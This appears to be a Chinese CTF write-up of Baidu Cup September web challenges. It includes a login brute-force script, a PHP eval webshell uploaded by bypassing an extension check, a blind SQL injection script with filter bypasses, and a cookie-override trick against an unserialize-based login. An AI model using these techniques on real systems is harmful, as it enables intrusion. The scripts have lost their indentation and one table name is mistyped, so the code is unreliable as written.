百度杯九月web题解
123
python脚本跑登录账户密码
# encoding: utf-8
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf8')
with open('user.php.bak') as f:
for line in f.readlines():
s=line.strip()
for i in range(1990,2000):
data={
"username":s,
"password":s+str(i),
"submit":"submit"
}
url = "http://86adc2d12122466badd619509fbcf3731899ba5ef4e34703.changame.ichunqiu.com/login.php"
rep=requests.post(url=url,data=data)
print(data)
if "登录失败" not in rep.text:
print(rep.text)
print("username = "+s)
print("password = " +s+str(i))
breakusername = zhangyuzhenpassword = zhangyuzhen1995
上传文件,提示需要有jpg后缀,猜测为白名单,直接构造shell.jpg.phtml
文件内容:<?=eval($_GET[_]);?>
访问/view.php?file=flaflagg得到flag得到flag
SQLI
过滤逗号,脚本如下
import requests
url="http://f75cd2c0820c4f3a88ff220eaa86d3901024ed0736f34044.changame.ichunqiu.com/l0gin.php"
str1=''
for i in range(1,20):
for j in range(32,127):
id=f"1' and ascii(substring((select concat(table_name) from information.schema_tables where table_schema=database()) from {i} for 1))={j} and '1"
param={'id':id}
rep=requests.get(url=url,params=param)
#print(rep.url)
#print(param)
if 'flag' in rep.text:
str1+=chr(j)
print(str1)
breakSQL
注入发现<>被替换为空,且先执行过滤在执行黑名单判断。sel<>ect绕过黑名单
LOGIN
array_merge合并函数,遇到null会返回NULL,这里$_SESSION为null.
所以传如cookie值去覆盖
<?php
include 'common.php';
$requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
if(isset($requset['token']))
{
$login = unserialize(gzuncompress(base64_decode($requset['token'])));
$db = new db();
$row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
if($login['user'] === 'ichunqiu')
{
echo $flag;
}else if($row['pass'] !== $login['pass']){
echo 'unserialize injection!!';
}else{
echo "(╯‵□′)╯︵┴─┴ ";
}
}else{
header('Location: index.php?error=1');
}
?>本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!